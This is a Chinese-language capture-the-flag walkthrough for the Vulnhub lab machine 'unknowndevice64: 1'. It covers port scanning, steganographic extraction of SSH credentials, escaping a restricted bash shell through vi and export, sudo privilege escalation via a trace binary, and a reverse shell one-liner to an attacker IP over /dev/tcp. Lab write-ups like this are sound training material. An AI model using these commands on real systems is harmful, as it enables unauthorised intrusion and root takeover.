靶机渗透测试(unknowndevice64: 1):
Vulnhub靶机 unknowndevice64: 1
靶机:修改靶机的网络配置为桥接模式。
攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。
靶机难度:(中等)
目标:成功渗透进入靶机,提升至root权限并且读取flag.txt 。
渗透流程:
1.探测主机ip(netdiscover -i eth0 -r 网关)
2.nmap进行靶机端口服务扫描
nmap -sS -Pn -A -p- -n 靶机ip
发现靶机开放1337-ssh端口服务,31337-http端口服务;
3.根据端口服务进行渗透(31337-http端口服务)
3.1. 登陆靶机web页面,进行web页面勘测,发现只有一个图形界面;
3.2. dirb,御剑进行web目录扫描:未能扫描出有用目录!!!!
3.3. ctrl+u 查看网页源代码:
发现隐藏目录:Key_is_hidd3n.jpg
3.4. 登陆靶机ip/Key_is_hidd3n.jpg,发现有一张图片,猜测ctf类隐写漏洞;
下载图片,可使用kali中的工具**steghid(开源隐写程序)**进行隐写!!!
隐写工具steghid使用教程:steghid(开源隐写工具)
用steghide进行提取其中的文本信息:
steghide extract -sf key_is_h1dd3n.jpg
提示需要密码,图片名称为 key_is_h1dd3n,那么密码就是 h1dd3n,成功提取出了h1dd3n.txt;文件信息为一种brainfuck的程序语言,使用在线工具https://copy.sh/brainfuck/,或者https://www.splitbrain.org/services/ook在线解密后即可获取到ssh的用户名和密码;
得到账号密码:
4.登陆ssh(1337-ssh端口服务)
4.1. 登录靶机ssh [email protected] -p 1337
密码登陆:
whoami >ud64
id
uname -a
发现好多命令被限制!!!!竟然是rbash的shell;
4.2 连续点击两次tab键,查看当前用户权限,及可以使用的命令:
发现vi和 export命令可以使用
[export命令用于设置或显示环境变量,在shell中执行程序时,shell会提供一组环境变量,export可新增,修改或删除环境变量]
1、在vi编辑器中,输入 :!/bin/bash
在vi命令行下输入!/bin/bash即可顺利进入bash
2、通过export命令修改环境变量,将/bin/bash导出到shell环境变量,将/usr/bin目录导出到PATH环境变量:
export SHELL=/bin/bash:$SHELLexport PATH=/usr/bin:$PATH
4.3. 进入正常的shell后,用 sudo -l命令查看下可执行的权限
sudo -l #通过/usr/bin/sysud64可以执行任何root权限的命令;
User ud64 may run the following commands on unknowndevice64_v1:
(ALL) NOPASSWD:/usr/bin/sysud64
5.提升权限:
切换至sysud64用户权限:
sudo sysud64(无密码登录sysud64)
报错
sudo sysud64 -h
发现可以使用:
-o file send trace output to FILE instead of stderr
尝试将root用户的shell导出到该用户下:
sudo sysud64 -o /dev/null /bin/sh
提权成功;此时权限为root权限,cat flag.txt得到flag:
方法二:
反弹shell:
首先kali虚拟机监听4444端口: nc -lvnp 4444
sudo sysud64 -uroot /bin/bash -c “/bin/sh -i >& /dev/tcp/192.168.10.202/4444 0>&1”
6.渗透总结
~nmap扫描端口时加上参数“-p-”;
~利用Tab键补全功能可查看所有可执行的命令。
~利用vi 绕过restricted bash
在线工具:
Brainfuck
超级棒的大佬博客:
利用sudo进行提权获得完整的root shell